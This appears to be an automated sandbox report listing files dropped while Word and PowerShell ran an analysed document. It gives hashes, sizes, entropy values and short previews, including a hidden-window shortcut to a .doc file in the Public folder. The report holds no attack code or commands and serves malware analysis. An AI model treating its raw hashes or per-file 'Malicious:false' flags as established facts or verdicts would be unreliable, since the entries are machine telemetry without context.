                                                                                                                                                        MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                                                                                                                        SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                                                                                                                        SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                                                                                                                        SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2527736
                                                                                                                                                        Entropy (8bit):7.992272975565323
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                                                                                                                        MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                                                                                                                        SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                                                                                                                        SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                                                                                                                        SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2591108
                                                                                                                                                        Entropy (8bit):7.999030891647433
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                                                                                                                        MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                                                                                                                        SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                                                                                                                        SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                                                                                                                        SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3256855
                                                                                                                                                        Entropy (8bit):7.996842935632312
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                                                                                                                        MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                                                                                                                        SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                                                                                                                        SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                                                                                                                        SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3417042
                                                                                                                                                        Entropy (8bit):7.997652455069165
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                                                                                                                                        MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                                                                                                                        SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                                                                                                                                        SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                                                                                                                        SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):512
                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3::
                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):436400
                                                                                                                                                        Entropy (8bit):5.960274162791494
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:EO61G+O/iBK93w89V6PRChZfwiqrlJeoL2AiW7URbxcB+Ozbck+iPgoMYKbqm5HZ:R6WeoF3TLfIbefN3kW21KL4W
                                                                                                                                                        MD5:979CD657B9AD349F524BC6D7C0565B04
                                                                                                                                                        SHA1:C8D835ED8E989828E19D1BAF7248A9062CB340F2
                                                                                                                                                        SHA-256:829917A5CE42BB892C697A8FD1CD21BC94EC26574E35750C6DE91C22030FA8AA
                                                                                                                                                        SHA-512:22D85CFDC7CC846D9861DBA55F37640144E246CEC42D0B14CC938E259A0EF302FD4AC81EF616D9440DD8C76DD2D1AF5634059BBD577176B25C6DF3326E2545B9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):30
                                                                                                                                                        Entropy (8bit):1.2389205950315936
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:/II:A
                                                                                                                                                        MD5:83ACA52A2CD4F3F907881B4BFFCC793A
                                                                                                                                                        SHA1:306ADAACDEF753C3E4DEB49061887DF497001D82
                                                                                                                                                        SHA-256:B2ACEAA510C91D4A0FAF9F10718977501FB8CA7E7489577BBC8B30147700B004
                                                                                                                                                        SHA-512:D5A2958B2200C68FD1E4C639B523F3A5DB6D2E36962AE22766479FED68692D1A89459B1CCDFD7A44252EE09835704FEB08FA5A837D5DF65C59F04AED33DCD76F
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.....-........................
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Generic INItialization configuration [folders]
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):50
                                                                                                                                                        Entropy (8bit):4.6038561897747226
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:M1+FUm4GC0Uv:M8LCj
                                                                                                                                                        MD5:EA6A0D1B052DC5DE1059FEBCF2309068
                                                                                                                                                        SHA1:FDAF13601481A540CFE5E51DCC66913ED1066C36
                                                                                                                                                        SHA-256:625F316DC7C7580E9F4D4832EEFB370EACBBA9E1E808291FD35E5F3A022AEECE
                                                                                                                                                        SHA-512:D8BE98679C92C913586B52C011D681DFB55AC2EBFE1501C356A1FAA1440ABCE82BD0FB15AC1AEA5784B5D033C855A308B9599F7B802853ABAF5A33B1D8BDDA06
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[doc]..pqg5u7vt.LNK=0..[folders]..pqg5u7vt.LNK=0..
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 19 10:51:16 2024, mtime=Thu Dec 19 10:51:20 2024, atime=Thu Dec 19 10:51:17 2024, length=29184, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):960
                                                                                                                                                        Entropy (8bit):4.684392014864233
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:8dZC00UlGIU/uCICHqXy74XTACmapGEJ8ycvOjAKhhlav1Cg44t2YZ/elFlSJmZc:8XtGwsHEGEJeKACsvkfqyFm
                                                                                                                                                        MD5:89CA47C9BED86A1FAFF5B3C890B69286
                                                                                                                                                        SHA1:4095079D203709B5D4281FB7D768015B5EB86117
                                                                                                                                                        SHA-256:A962228FE8405D6AEE2C12994F42DD7FB1356C9669A8B64BCAE3500A58E8E29F
                                                                                                                                                        SHA-512:D13DD813C3E70C1D5238096BAF964AFADCD142956969353801CE713B533EDD0EE49829E80BDFE6F0F10857FA2934B38CE21D6C75F3F2FC40B4EB9D21F3F111C7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:L..................F.... ...R.O.R.....Q.R.....O.R...r...........................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH.YV^....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......Yi^..Public..f......O.I.Yi^....+...............<.........P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....f.2..r...Yi^ .pqg5u7vt.doc..J......Yi^.Yi^..........................q.p.q.g.5.u.7.v.t...d.o.c.......K...............-.......J............F.......C:\Users\Public\pqg5u7vt.doc..%.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.p.q.g.5.u.7.v.t...d.o.c..........v..*.cM.jVD.Es.!...`.......X.......745773...........hT..CrF.f4... ..!.......,.......hT..CrF.f4... ..!.......,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):562113
                                                                                                                                                        Entropy (8bit):7.67409707491542
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                                        MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                                        SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                                        SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                                        SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1649585
                                                                                                                                                        Entropy (8bit):7.875240099125746
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                                        MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                                        SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                                        SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                                        SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):558035
                                                                                                                                                        Entropy (8bit):7.696653383430889
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                                        MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                                        SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                                        SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                                        SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):570901
                                                                                                                                                        Entropy (8bit):7.674434888248144
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                                        MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                                        SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                                        SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                                        SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):523048
                                                                                                                                                        Entropy (8bit):7.715248170753013
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                                        MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                                        SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                                        SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                                        SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3078052
                                                                                                                                                        Entropy (8bit):7.954129852655753
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                                        MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                                        SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                                        SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                                        SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):777647
                                                                                                                                                        Entropy (8bit):7.689662652914981
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                                        MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                                        SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                                        SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                                        SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):924687
                                                                                                                                                        Entropy (8bit):7.824849396154325
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                                        MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                                        SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                                        SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                                        SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):966946
                                                                                                                                                        Entropy (8bit):7.8785200658952
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                                        MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                                        SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                                        SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                                        SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1204049
                                                                                                                                                        Entropy (8bit):7.92476783994848
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                                        MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                                        SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                                        SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                                        SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):486596
                                                                                                                                                        Entropy (8bit):7.668294441507828
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                                        MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                                        SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                                        SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                                        SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):976001
                                                                                                                                                        Entropy (8bit):7.791956689344336
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                                        MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                                        SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                                        SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                                                        SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1463634
                                                                                                                                                        Entropy (8bit):7.898382456989258
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                                        MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                                        SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                                        SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                                        SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2218943
                                                                                                                                                        Entropy (8bit):7.942378408801199
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                                        MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                                        SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                                        SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                                        SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1750795
                                                                                                                                                        Entropy (8bit):7.892395931401988
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                                        MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                                        SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                                        SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                                        SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2924237
                                                                                                                                                        Entropy (8bit):7.970803022812704
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                                        MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                                        SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                                        SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                                        SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2357051
                                                                                                                                                        Entropy (8bit):7.929430745829162
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                                        MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                                        SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                                        SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                                        SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3611324
                                                                                                                                                        Entropy (8bit):7.965784120725206
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                                        MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                                        SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                                        SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
